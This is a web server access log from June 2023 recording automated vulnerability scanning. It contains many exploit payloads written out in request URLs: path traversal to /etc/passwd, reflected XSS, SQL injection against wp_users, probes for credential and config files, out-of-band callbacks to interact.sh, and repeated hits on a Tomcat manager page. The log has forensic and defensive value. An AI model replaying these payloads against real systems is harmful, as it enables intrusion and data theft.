107.189.31.184 - - [17/Jun/2023:08:20:43 +0530] "GET /picturesPreview?urls=aHR0cDovLzEyNy4wLjAuMS8xLnR4dCI%2BPHN2Zy9vbmxvYWQ9YWxlcnQoZG9jdW1lbnQuZG9tYWluKT4%3D HTTP/1.1" 404 1024
138.255.12.172 - - [17/Jun/2023:08:21:36 +0530] "GET / HTTP/1.1" 200 11250
41.186.73.134 - - [17/Jun/2023:08:21:45 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:08:22:29 +0530] "GET /ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:08:22:31 +0530] "GET /ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:08:22:31 +0530] "GET /ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:08:22:33 +0530] "GET /ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg HTTP/1.1" 404 1028
41.186.73.134 - - [17/Jun/2023:08:22:46 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:08:22:47 +0530] "GET /descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample HTTP/1.1" 404 1082
107.189.31.184 - - [17/Jun/2023:08:22:48 +0530] "GET /descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample HTTP/1.1" 404 1082
107.189.31.184 - - [17/Jun/2023:08:22:49 +0530] "GET /jenkins/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample HTTP/1.1" 404 1098
107.189.31.184 - - [17/Jun/2023:08:22:50 +0530] "GET /jenkins/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample HTTP/1.1" 404 1098
107.189.31.184 - - [17/Jun/2023:08:23:32 +0530] "GET /?lang=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cp%20class=%22&p=1 HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:08:23:33 +0530] "GET /?lang=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cp%20class=%22&p=1 HTTP/1.1" 200 11250
41.186.73.134 - - [17/Jun/2023:08:26:02 +0530] "GET /manager/html HTTP/1.1" 401 2473
82.137.255.144 - - [17/Jun/2023:08:26:15 +0530] "GET / HTTP/1.1" 200 11250
45.128.232.141 - - [17/Jun/2023:08:26:30 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:08:26:58 +0530] "GET / HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:08:26:59 +0530] "GET / HTTP/1.1" 200 11250
41.186.73.134 - - [17/Jun/2023:08:27:08 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:08:27:47 +0530] "GET /wp-admin/admin-ajax.php?action=fetch_posts&hash=%3Cimg%20src=x%20onerror=alert(document.domain)%3E&stream-id=1 HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:08:27:47 +0530] "GET /wp-admin/admin-ajax.php?action=fetch_posts&hash=%3Cimg%20src=x%20onerror=alert(document.domain)%3E&stream-id=1 HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:08:28:08 +0530] "GET /shib_logout.php?action=logout&return=https://example.com HTTP/1.1" 404 1024
107.189.31.184 - - [17/Jun/2023:08:28:09 +0530] "GET /shib_logout.php?action=logout&return=https://example.com HTTP/1.1" 404 1024
107.189.31.184 - - [17/Jun/2023:08:28:11 +0530] "GET /ilias/shib_logout.php?action=logout&return=https://example.com HTTP/1.1" 404 1036
107.189.31.184 - - [17/Jun/2023:08:28:12 +0530] "GET /ilias/shib_logout.php?action=logout&return=https://example.com HTTP/1.1" 404 1036
41.186.73.134 - - [17/Jun/2023:08:30:26 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:08:31:32 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:08:32:37 +0530] "GET /magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&pluginclass=CustomSQLUtility&plugintype=utilities HTTP/1.1" 404 1052
107.189.31.184 - - [17/Jun/2023:08:32:38 +0530] "GET /magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&pluginclass=CustomSQLUtility&plugintype=utilities HTTP/1.1" 404 1052
41.186.73.134 - - [17/Jun/2023:08:34:47 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:08:35:41 +0530] "GET /settings HTTP/1.1" 404 1010
107.189.31.184 - - [17/Jun/2023:08:35:41 +0530] "GET /settings HTTP/1.1" 404 1010
41.186.73.134 - - [17/Jun/2023:08:35:49 +0530] "GET /manager/html HTTP/1.1" 401 2473
64.62.197.42 - - [17/Jun/2023:08:35:54 +0530] "GET / HTTP/1.1" 200 11250
64.62.197.41 - - [17/Jun/2023:08:36:35 +0530] "GET /favicon.ico HTTP/1.1" 200 21630
64.62.197.39 - - [17/Jun/2023:08:36:59 +0530] "GET /?format=json HTTP/1.1" 200 11250
64.62.197.32 - - [17/Jun/2023:08:37:11 +0530] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:08:37:27 +0530] "GET /search?query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 1006
107.189.31.184 - - [17/Jun/2023:08:37:28 +0530] "GET /search?query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 1006
107.189.31.184 - - [17/Jun/2023:08:37:45 +0530] "GET /index.php?option=com_jotloader&section=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:08:37:46 +0530] "GET /index.php?option=com_jotloader&section=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 1012
41.186.73.134 - - [17/Jun/2023:08:39:16 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:08:40:21 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:08:40:56 +0530] "GET /php/ssh_form.php?hostname=%3C/title%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Ctitle%3E HTTP/1.1" 404 1026
107.189.31.184 - - [17/Jun/2023:08:40:57 +0530] "GET /php/ssh_form.php?hostname=%3C/title%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Ctitle%3E HTTP/1.1" 404 1026
107.189.31.184 - - [17/Jun/2023:08:41:25 +0530] "GET /ACSServer/DownloadFileServlet?path=anything&show_file_name=../../../../../../etc/passwd&type=uploadfile HTTP/1.1" 404 1052
107.189.31.184 - - [17/Jun/2023:08:41:26 +0530] "GET /ACSServer/DownloadFileServlet?path=anything&show_file_name=../../../../../../etc/passwd&type=uploadfile HTTP/1.1" 404 1052
107.189.31.184 - - [17/Jun/2023:08:41:28 +0530] "GET /ACSServer/DownloadFileServlet?path=anything&show_file_name=../../../../../../windows/win.ini&type=uploadfile HTTP/1.1" 404 1052
107.189.31.184 - - [17/Jun/2023:08:41:29 +0530] "GET /ACSServer/DownloadFileServlet?path=anything&show_file_name=../../../../../../windows/win.ini&type=uploadfile HTTP/1.1" 404 1052
107.189.31.184 - - [17/Jun/2023:08:41:47 +0530] "GET /adm_program/system/redirect.php?url=javascript://%250aalert(document.domain) HTTP/1.1" 404 1056
107.189.31.184 - - [17/Jun/2023:08:41:48 +0530] "GET /adm_program/system/redirect.php?url=javascript://%250aalert(document.domain) HTTP/1.1" 404 1056
41.186.73.134 - - [17/Jun/2023:08:43:37 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:08:44:25 +0530] "GET /wp-content/plugins/whizz/plugins/delete-plugin.php?plugin=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1094
107.189.31.184 - - [17/Jun/2023:08:44:26 +0530] "GET /wp-content/plugins/whizz/plugins/delete-plugin.php?plugin=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1094
41.186.73.134 - - [17/Jun/2023:08:44:40 +0530] "GET /manager/html HTTP/1.1" 401 2473
90.151.171.108 - - [17/Jun/2023:08:45:50 +0530] "CONNECT v4.ident.me:443 HTTP/1.1" 400 -
90.151.171.108 - - [17/Jun/2023:08:45:50 +0530] "CONNECT ip.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.108 - - [17/Jun/2023:08:45:55 +0530] "-" 400 -
90.151.171.108 - - [17/Jun/2023:08:45:56 +0530] "-" 400 -
90.151.171.108 - - [17/Jun/2023:08:46:00 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.108 - - [17/Jun/2023:08:46:01 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.108 - - [17/Jun/2023:08:46:06 +0530] "-" 400 -
90.151.171.108 - - [17/Jun/2023:08:46:06 +0530] "-" 400 -
107.189.31.184 - - [17/Jun/2023:08:47:43 +0530] "GET / HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:08:47:44 +0530] "GET / HTTP/1.1" 200 11250
41.186.73.134 - - [17/Jun/2023:08:48:02 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:08:49:06 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:08:49:38 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:08:49:39 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:08:49:44 +0530] "GET /.s3cfg HTTP/1.1" 404 1006
107.189.31.184 - - [17/Jun/2023:08:49:45 +0530] "GET /.s3cfg HTTP/1.1" 404 1006
107.189.31.184 - - [17/Jun/2023:08:51:43 +0530] "POST /index.php?s=captcha HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:08:51:44 +0530] "POST /index.php?s=captcha HTTP/1.1" 404 1012
41.186.73.134 - - [17/Jun/2023:08:52:34 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:08:53:37 +0530] "GET /platformio.ini HTTP/1.1" 404 1022
107.189.31.184 - - [17/Jun/2023:08:53:37 +0530] "GET /platformio.ini HTTP/1.1" 404 1022
41.186.73.134 - - [17/Jun/2023:08:53:42 +0530] "GET /manager/html HTTP/1.1" 401 2473
209.141.41.129 - - [17/Jun/2023:08:53:58 +0530] "CONNECT www.baidu.com:443 HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:08:56:00 +0530] "GET /do/job.php?job=download&url=ZGF0YS9jb25maWcucGg8 HTTP/1.1" 404 1014
107.189.31.184 - - [17/Jun/2023:08:56:00 +0530] "GET /do/job.php?job=download&url=ZGF0YS9jb25maWcucGg8 HTTP/1.1" 404 1014
107.189.31.184 - - [17/Jun/2023:08:56:31 +0530] "GET /zimbra/h/search?action&csi=1&cso=0&id=%22%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sfi=4&si=1&so=0&st=message HTTP/1.1" 404 1024
107.189.31.184 - - [17/Jun/2023:08:56:32 +0530] "GET /zimbra/h/search?action&csi=1&cso=0&id=%22%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sfi=4&si=1&so=0&st=message HTTP/1.1" 404 1024
41.186.73.134 - - [17/Jun/2023:08:57:06 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:08:57:19 +0530] "GET /plugin/build-metrics/getBuildStats?Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&Submit=Search&causeFilter&causeFilteringType=ALL&jobFilter&jobFilteringType=ALL&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&label=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E&launcherFilter&launcherFilteringType=ALL&nodeFilter&nodeFilteringType=ALL&range=2&rangeUnits=Weeks HTTP/1.1" 404 1062
107.189.31.184 - - [17/Jun/2023:08:57:20 +0530] "GET /plugin/build-metrics/getBuildStats?Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&Submit=Search&causeFilter&causeFilteringType=ALL&jobFilter&jobFilteringType=ALL&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&label=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E&launcherFilter&launcherFilteringType=ALL&nodeFilter&nodeFilteringType=ALL&range=2&rangeUnits=Weeks HTTP/1.1" 404 1062
41.186.73.134 - - [17/Jun/2023:08:58:10 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:09:00:04 +0530] "POST /v2/api/product/manger/getInfo HTTP/1.1" 404 1052
107.189.31.184 - - [17/Jun/2023:09:00:05 +0530] "POST /v2/api/product/manger/getInfo HTTP/1.1" 404 1052
107.189.31.184 - - [17/Jun/2023:09:00:42 +0530] "GET /wp-content/themes/weekender/friend.php?id=aHR0cHM6Ly9pbnRlcmFjdC5zaA== HTTP/1.1" 404 1070
107.189.31.184 - - [17/Jun/2023:09:00:42 +0530] "GET /wp-content/themes/weekender/friend.php?id=aHR0cHM6Ly9pbnRlcmFjdC5zaA== HTTP/1.1" 404 1070
41.186.73.134 - - [17/Jun/2023:09:01:36 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:09:02:44 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:09:02:49 +0530] "GET /?ct_baths_plus&ct_beds_plus&ct_brokerage=0&ct_city&ct_community=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&ct_keyword&ct_lotsize_from&ct_lotsize_to&ct_mls&ct_mobile_keyword&ct_price_from&ct_price_to&ct_sqft_from&ct_sqft_to&ct_year_from&ct_year_to&ct_zipcode&lat&lng&search-listings=true HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:09:02:49 +0530] "GET /?ct_baths_plus&ct_beds_plus&ct_brokerage=0&ct_city&ct_community=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&ct_keyword&ct_lotsize_from&ct_lotsize_to&ct_mls&ct_mobile_keyword&ct_price_from&ct_price_to&ct_sqft_from&ct_sqft_to&ct_year_from&ct_year_to&ct_zipcode&lat&lng&search-listings=true HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:09:06:10 +0530] "GET /?fields=%2a%20from%20wp_users--%20-&filter=%7b%7d&rest_route=/wpgmza/v1/markers HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:09:06:11 +0530] "GET /?fields=%2a%20from%20wp_users--%20-&filter=%7b%7d&rest_route=/wpgmza/v1/markers HTTP/1.1" 200 11250
41.186.73.134 - - [17/Jun/2023:09:06:21 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:09:07:34 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:09:08:16 +0530] "GET /config/default.json HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:09:08:17 +0530] "GET /config/default.json HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:09:08:19 +0530] "GET /config.json HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:09:08:21 +0530] "GET /config/config.json HTTP/1.1" 404 1030
107.189.31.184 - - [17/Jun/2023:09:08:21 +0530] "GET /config.json HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:09:08:23 +0530] "GET /credentials/config.json HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:09:08:23 +0530] "GET /config/config.json HTTP/1.1" 404 1030
107.189.31.184 - - [17/Jun/2023:09:08:25 +0530] "GET /credentials/config.json HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:09:08:54 +0530] "GET /updating.jsp?url=https://interact.sh/ HTTP/1.1" 404 1018
107.189.31.184 - - [17/Jun/2023:09:08:54 +0530] "GET /updating.jsp?url=https://interact.sh/ HTTP/1.1" 404 1018
107.189.31.184 - - [17/Jun/2023:09:09:55 +0530] "GET /secure/ViewUserHover.jspa HTTP/1.1" 404 1044
107.189.31.184 - - [17/Jun/2023:09:09:56 +0530] "GET /secure/ViewUserHover.jspa HTTP/1.1" 404 1044
107.189.31.184 - - [17/Jun/2023:09:10:32 +0530] "POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1" 404 1082
107.189.31.184 - - [17/Jun/2023:09:10:32 +0530] "POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1" 404 1082
78.108.177.50 - - [17/Jun/2023:09:10:59 +0530] "GET / HTTP/1.0" 200 11230
41.186.73.134 - - [17/Jun/2023:09:11:02 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:09:12:12 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:09:12:18 +0530] "GET /.travis.yml HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:09:12:19 +0530] "GET /.travis.yml HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:09:12:20 +0530] "GET /matomo/.travis.yml HTTP/1.1" 404 1030
107.189.31.184 - - [17/Jun/2023:09:12:21 +0530] "GET /matomo/.travis.yml HTTP/1.1" 404 1030
107.189.31.184 - - [17/Jun/2023:09:13:14 +0530] "GET /guestLogin.html?guest=1 HTTP/1.1" 404 1024
107.189.31.184 - - [17/Jun/2023:09:13:14 +0530] "GET /guestLogin.html?guest=1 HTTP/1.1" 404 1024
107.189.31.184 - - [17/Jun/2023:09:13:25 +0530] "POST /lucee/admin/imgProcess.cfm?file=/whatever HTTP/1.1" 404 1046
107.189.31.184 - - [17/Jun/2023:09:13:28 +0530] "POST /lucee/admin/imgProcess.cfm?file=/whatever HTTP/1.1" 404 1046
107.189.31.184 - - [17/Jun/2023:09:13:28 +0530] "POST /lucee/admin/imgProcess.cfm?file=/../../../context/2RHothIvHe3k34TaoHom4VU2qoK.cfm HTTP/1.1" 404 1046
107.189.31.184 - - [17/Jun/2023:09:13:30 +0530] "POST /lucee/admin/imgProcess.cfm?file=/../../../context/2RHothIvHe3k34TaoHom4VU2qoK.cfm HTTP/1.1" 404 1046
107.189.31.184 - - [17/Jun/2023:09:13:30 +0530] "POST /lucee/2RHothIvHe3k34TaoHom4VU2qoK.cfm HTTP/1.1" 404 1068
107.189.31.184 - - [17/Jun/2023:09:13:33 +0530] "POST /lucee/2RHothIvHe3k34TaoHom4VU2qoK.cfm HTTP/1.1" 404 1068
107.189.31.184 - - [17/Jun/2023:09:14:11 +0530] "GET /loggers HTTP/1.1" 404 1008
107.189.31.184 - - [17/Jun/2023:09:14:11 +0530] "GET /loggers HTTP/1.1" 404 1008
107.189.31.184 - - [17/Jun/2023:09:14:13 +0530] "GET /actuator/loggers HTTP/1.1" 404 1026
107.189.31.184 - - [17/Jun/2023:09:14:14 +0530] "GET /actuator/loggers HTTP/1.1" 404 1026
41.186.73.134 - - [17/Jun/2023:09:15:51 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:09:17:00 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:09:18:08 +0530] "POST / HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:09:18:09 +0530] "POST / HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:09:18:32 +0530] "POST /wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php HTTP/1.1" 404 1172
107.189.31.184 - - [17/Jun/2023:09:18:32 +0530] "POST /wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php HTTP/1.1" 404 1172
107.189.31.184 - - [17/Jun/2023:09:19:59 +0530] "GET /?action=dzsap_download&link=../../../../../../../../../../../../../etc/passwd HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:09:20:01 +0530] "GET /?action=dzsap_download&link=../../../../../../../../../../../../../etc/passwd HTTP/1.1" 200 11250
41.186.73.134 - - [17/Jun/2023:09:20:38 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:09:20:47 +0530] "POST /jolokia/read/getDiagnosticOptions HTTP/1.1" 404 1060
107.189.31.184 - - [17/Jun/2023:09:20:48 +0530] "POST /jolokia/read/getDiagnosticOptions HTTP/1.1" 404 1060
107.189.31.184 - - [17/Jun/2023:09:20:51 +0530] "GET /index.php?fileid=../../../../../../../../../../etc/passwd%00&option=com_simpledownload&task=download HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:09:20:52 +0530] "GET /index.php?fileid=../../../../../../../../../../etc/passwd%00&option=com_simpledownload&task=download HTTP/1.1" 404 1012
41.186.73.134 - - [17/Jun/2023:09:21:51 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:09:24:08 +0530] "GET /mod/jitsi/sessionpriv.php?avatar=https%3A%2F%2F103.145.51.236:8080%2Fuser%2Fpix.php%2F498%2Ff1.jpg&nom=test_user%27)%3balert(document.domain)%3b//&ses=test_user&t=1 HTTP/1.1" 404 1044
107.189.31.184 - - [17/Jun/2023:09:24:09 +0530] "GET /mod/jitsi/sessionpriv.php?avatar=https%3A%2F%2F103.145.51.74:8080%2Fuser%2Fpix.php%2F498%2Ff1.jpg&nom=test_user%27)%3balert(document.domain)%3b//&ses=test_user&t=1 HTTP/1.1" 404 1044
107.189.31.184 - - [17/Jun/2023:09:24:17 +0530] "POST /autodiscover/autodiscover.json HTTP/1.1" 404 1054
107.189.31.184 - - [17/Jun/2023:09:24:18 +0530] "POST /autodiscover/autodiscover.json HTTP/1.1" 404 1054
107.189.31.184 - - [17/Jun/2023:09:24:29 +0530] "POST /getcfg.php HTTP/1.1" 404 1014
107.189.31.184 - - [17/Jun/2023:09:24:30 +0530] "POST /getcfg.php HTTP/1.1" 404 1014
41.186.73.134 - - [17/Jun/2023:09:25:19 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:09:26:19 +0530] "GET /user/login HTTP/1.1" 404 1014
107.189.31.184 - - [17/Jun/2023:09:26:20 +0530] "GET /user/login HTTP/1.1" 404 1014
41.186.73.134 - - [17/Jun/2023:09:26:29 +0530] "GET /manager/html HTTP/1.1" 401 2473
194.163.183.16 - - [17/Jun/2023:09:26:52 +0530] "GET / HTTP/1.1" 200 11250
194.163.183.16 - - [17/Jun/2023:09:26:52 +0530] "GET /gui HTTP/1.1" 404 1000
107.189.31.184 - - [17/Jun/2023:09:28:15 +0530] "POST /wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?control=upload&form=%3C/script%3E%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1" 404 1116
107.189.31.184 - - [17/Jun/2023:09:28:15 +0530] "POST /wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?control=upload&form=%3C/script%3E%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1" 404 1116
107.189.31.184 - - [17/Jun/2023:09:29:05 +0530] "GET /?view=log HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:09:29:05 +0530] "GET /?view=log HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:09:29:07 +0530] "GET /zm/?view=log HTTP/1.1" 404 1000
107.189.31.184 - - [17/Jun/2023:09:29:07 +0530] "GET /zm/?view=log HTTP/1.1" 404 1000
41.186.73.134 - - [17/Jun/2023:09:29:47 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:09:30:50 +0530] "GET /manager/html HTTP/1.1" 401 2473
90.151.171.106 - - [17/Jun/2023:09:31:12 +0530] "CONNECT eth0.me:443 HTTP/1.1" 400 -
90.151.171.106 - - [17/Jun/2023:09:31:12 +0530] "CONNECT check.best-proxies.ru:443 HTTP/1.1" 400 -
90.151.171.106 - - [17/Jun/2023:09:31:17 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:09:31:17 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:09:31:22 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [17/Jun/2023:09:31:22 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:09:31:22 +0530] "GET /ip.php?Z70629657371Q1 HTTP/1.1" 404 1006
90.151.171.106 - - [17/Jun/2023:09:31:22 +0530] "-" 400 -
107.189.31.184 - - [17/Jun/2023:09:31:53 +0530] "POST /webapi/auth HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:09:31:53 +0530] "POST /webapi/auth HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:09:33:23 +0530] "GET /Vagrantfile HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:09:33:24 +0530] "GET /Vagrantfile HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:09:33:26 +0530] "GET /wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/etc/passwd HTTP/1.1" 404 1104
107.189.31.184 - - [17/Jun/2023:09:33:26 +0530] "GET /wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/etc/passwd HTTP/1.1" 404 1104
107.189.31.184 - - [17/Jun/2023:09:33:27 +0530] "GET /wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/Windows/win.ini HTTP/1.1" 404 1104
107.189.31.184 - - [17/Jun/2023:09:33:29 +0530] "GET /wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/Windows/win.ini HTTP/1.1" 404 1104
41.186.73.134 - - [17/Jun/2023:09:34:11 +0530] "GET /manager/html HTTP/1.1" 401 2473
167.94.146.57 - - [17/Jun/2023:09:35:00 +0530] "GET / HTTP/1.1" 200 11250
167.94.146.57 - - [17/Jun/2023:09:35:00 +0530] "GET / HTTP/1.1" 200 11250
167.94.146.57 - - [17/Jun/2023:09:35:01 +0530] "PRI * HTTP/2.0" 505 -
167.94.146.57 - - [17/Jun/2023:09:35:01 +0530] "GET /favicon.ico HTTP/1.1" 200 21630
41.186.73.134 - - [17/Jun/2023:09:35:15 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:09:35:49 +0530] "GET /backupsettings.dat HTTP/1.1" 404 1030
107.189.31.184 - - [17/Jun/2023:09:35:50 +0530] "GET /filemanager/ajax_calls.php?action=get_file&file=../../../../etc/passwd&preview_mode=text&sub_action=preview&title=source HTTP/1.1" 404 1046
107.189.31.184 - - [17/Jun/2023:09:35:50 +0530] "GET /backupsettings.dat HTTP/1.1" 404 1030
107.189.31.184 - - [17/Jun/2023:09:35:51 +0530] "GET /filemanager/ajax_calls.php?action=get_file&file=../../../../etc/passwd&preview_mode=text&sub_action=preview&title=source HTTP/1.1" 404 1046
41.186.73.134 - - [17/Jun/2023:09:38:34 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:09:39:45 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:09:40:13 +0530] "POST /admin/asign-single-student-subjects.php HTTP/1.1" 404 1072
